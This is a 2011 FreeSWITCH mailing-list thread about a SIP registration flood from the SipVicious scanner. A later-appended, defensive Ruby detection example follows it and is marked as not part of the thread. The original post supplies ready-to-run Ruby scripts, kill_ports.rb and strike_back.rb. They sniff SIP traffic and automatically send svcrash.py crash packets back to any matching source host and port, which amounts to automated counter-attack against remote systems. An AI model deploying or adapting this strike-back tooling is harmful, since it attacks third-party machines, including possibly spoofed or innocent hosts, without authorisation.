[Freeswitch-users] SPIT attack and how to strike back

Kerem Erciyes kerem.erciyes at gmail.com
Thu Apr 21 15:10:19 MSD 2011


That would work until the attacker defines a custom user-agent string. There have
been reports of modified SipVicious code using Asterisk PBX as the agent.

On Thu, Apr 21, 2011 at 4:13 AM, Denis Galvao <denisgalvao at gmail.com> wrote:

> Nice! Thanks for sharing!
>
> Denis
>
> 2011/4/20, Peter P GMX <Prometheus001 at gmx.net>:
> > Hello all,
> >
> > I would like to share this with you as you may have also been affected
> > by this threat.
> >
> > Yesterday we received a SPIT attack to our Freeswitch servers. We had
> > about 50 register requests/sec. We noticed this as we saw a slight
> > increase in the load of the Freeswitch servers. Fortunately Freeswitch
> > can handle a huge amount of register requests so we had no denial of
> > service.
> >
> > You can identify this attack by finding the following in the Register
> > message:
> >     User-Agent: friendly-scanner
> >
> > How to get rid of it:
> > The attacker used Sipvicious (friendly-scanner). Sipvicious itself has a
> > nice tool "svcrash.py" which can send a malformed packet back to the
> > attacker which crashes their own Sipvicious tool. You can issue this tool by
> >   python svcrash.py -d <host of attacker> -p <port of attacker>
> > You will need port 5060 on your machine to work. But there is also a
> > workaround for that. svcrash.py will show how to overcome this if your
> > port 5060 is not available.
> > Download it here
> > http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz and
> > unpack it to a folder of your choice.
> >
> > I wrote a small Ruby script to send the packet back to a port range, as
> > our attacker used some dozens of ports to send.
> > Here is the script (Install ruby first by "apt-get install ruby" e.g. on
> > Debian based systems). Put it into the sipvicious directory
> > kill_ports.rb:
> >
> > #!/usr/bin/env ruby
> > host=ARGV[0]
> > start_port=ARGV[1].to_i
> > end_port=ARGV[2].to_i
> > start_port.upto(end_port) do |port|
> >   cmd="python svcrash.py -d #{host} -p #{port}"
> >   p cmd
> >   erg=`#{cmd}`
> >   p erg
> > end
> >
> > You now can run it by
> > ./kill_ports.rb <ip> <from_port> <to_port>
> >
> > By using this tool we got rid of most of the SPIT messages. But after a
> > while they started again to attack us from different ports.
> >
> > The next step is: Why not automate this by trying to identify host and
> > port automatically and send back the svcrash.py packet to the sender's port?
> >
> > First install the pcap library
> >     apt-get install libpcap-dev libpcap-ruby
> >
> > Then I wrote the following tool to automate this, it makes use of the
> > kill_ports.rb above:
> > strike_back.rb:
> >
> > #!/usr/bin/env ruby
> > # I used some code from http://snippets.dzone.com/posts/show/5931
> > require 'pcaplet'
> > require 'logger'
> > require 'timeout'
> > @timeout=3600 # max runtime: 1 hour
> >
> > @logfile='strike_back.log'
> > class AuditLogger < Logger
> >   def format_message(severity, timestamp, progname, msg)
> >     puts msg
> >     "#{msg}\n"
> >   end
> > end
> >
> > logfile = File.open(@logfile, 'a')
> > LOGGER = AuditLogger.new(logfile)
> > LOGGER.level = Logger::INFO
> > search="friendly-scanner"
> > puts "Searching for '#{search}' in SIP packets"
> > $network = Pcaplet.new('-s 1500')
> > $filter = Pcap::Filter.new('udp and dst port 5060', $network.capture)
> > $network.add_filter($filter)
> > puts "Logfile: #{@logfile}"
> > puts "Starting capture..."
> > begin
> >   Timeout.timeout(@timeout) do # 3600 sec
> >     for p in $network
> >         header = "#{Time.now.strftime("%Y-%m-%d %H:%M:%S")} #{p.src}:#{p.sport} => #{p.dst}:#{p.dport}"
> >         if $filter =~ p
> >             #puts "simple search"
> >             if p.udp_data.index(search)
> >               LOGGER.info "Kill Friendly scanner #{p.src} with Source Port #{p.sport}"
> >               cmd="./kill_ports.rb #{p.src} #{p.sport} #{p.sport}"
> >               erg=`#{cmd}`
> >               p erg
> >               LOGGER.info header
> >               LOGGER.info p.udp_data
> >             end
> >         end
> >     end
> >   end
> > rescue Timeout::Error
> >   logfile.flush
> >   puts "Timeout - finished."
> > end
> >
> > There may be a better way to code this, but at least it worked. After
> > about 15min the number of attacks went to 0.
> >
> > Disclaimer: You can damage other systems by using these tools. So be
> > careful and use at your own risk. Do not use this tool for attacking
> > other systems!
> >
> > Best regards
> > Peter
> >
> > _______________________________________________
> > FreeSWITCH-users mailing list
> > FreeSWITCH-users at lists.freeswitch.org
> > http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
> > UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users
> > http://www.freeswitch.org
> >
>
> --
> Sent from my mobile phone
>
>



-- 
Kerem Erciyes - Systems Consultant
http://keremerciyes.com
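As an added example (not code from this thread or from SipVicious), here is the detection side only, in the same Ruby the thread uses: it parses REGISTER payloads, flags the stock "friendly-scanner" User-Agent, and falls back to a per-source REGISTER rate threshold for the customised-UA case raised above. Sample packets, IP addresses and the window/threshold values are constructed.

```ruby
# Defender-side detection of SipVicious-style REGISTER floods: match the stock
# scanner User-Agent, and for spoofed UAs fall back to a per-source rate check.
KNOWN_SCANNER_AGENTS = ['friendly-scanner', 'sipvicious'].freeze

# Extract the request method and User-Agent header from a raw SIP UDP payload.
def parse_sip_request(payload)
  lines = payload.split(/\r?\n/)
  method = lines.first.to_s.split(' ').first.to_s
  ua_line = lines.find { |l| l =~ /\AUser-Agent:/i }
  { method: method, user_agent: ua_line.to_s.sub(/\AUser-Agent:\s*/i, '').strip }
end

# Sliding-window REGISTER counter per source IP (thresholds are hypothetical).
class RegisterRateTracker
  def initialize(window_secs: 1.0, max_per_window: 20)
    @window, @max = window_secs, max_per_window
    @seen = Hash.new { |h, k| h[k] = [] }
  end

  # Returns :scanner_ua, :rate_limit, or nil for a packet seen at time `now`.
  def classify(src_ip, payload, now)
    req = parse_sip_request(payload)
    return nil unless req[:method] == 'REGISTER'
    ua = req[:user_agent].downcase
    return :scanner_ua if KNOWN_SCANNER_AGENTS.any? { |s| ua.include?(s) }
    times = @seen[src_ip]
    times << now
    times.reject! { |t| now - t > @window }   # drop entries outside the window
    times.size > @max ? :rate_limit : nil
  end
end

def build_register(ua)   # constructed minimal REGISTER request
  "REGISTER sip:pbx.example.com SIP/2.0\r\nVia: SIP/2.0/UDP 0.0.0.0:5060\r\n" \
  "From: <sip:100@pbx.example.com>\r\nUser-Agent: #{ua}\r\nContent-Length: 0\r\n\r\n"
end

# [timestamp, source IP, payload]: one stock scanner packet, a 30/s burst from a
# scanner claiming to be "Asterisk PBX", and one legitimate phone register.
SAMPLE_TRAFFIC =
  [[0.0, '203.0.113.5', build_register('friendly-scanner')]] +
  (0...30).map { |i| [i * 0.02, '198.51.100.9', build_register('Asterisk PBX')] } +
  [[0.5, '192.0.2.20', build_register('Grandstream GXP2130')]]

# Run the tracker over a traffic sample; the first non-nil verdict per source wins.
def flag_sources(traffic, tracker = RegisterRateTracker.new)
  traffic.each_with_object({}) do |(ts, ip, payload), verdicts|
    verdict = tracker.classify(ip, payload, ts)
    verdicts[ip] ||= verdict if verdict
  end
end
```

The verdict hash is what you would feed into a firewall rule or a FreeSWITCH ACL update instead of a reply packet.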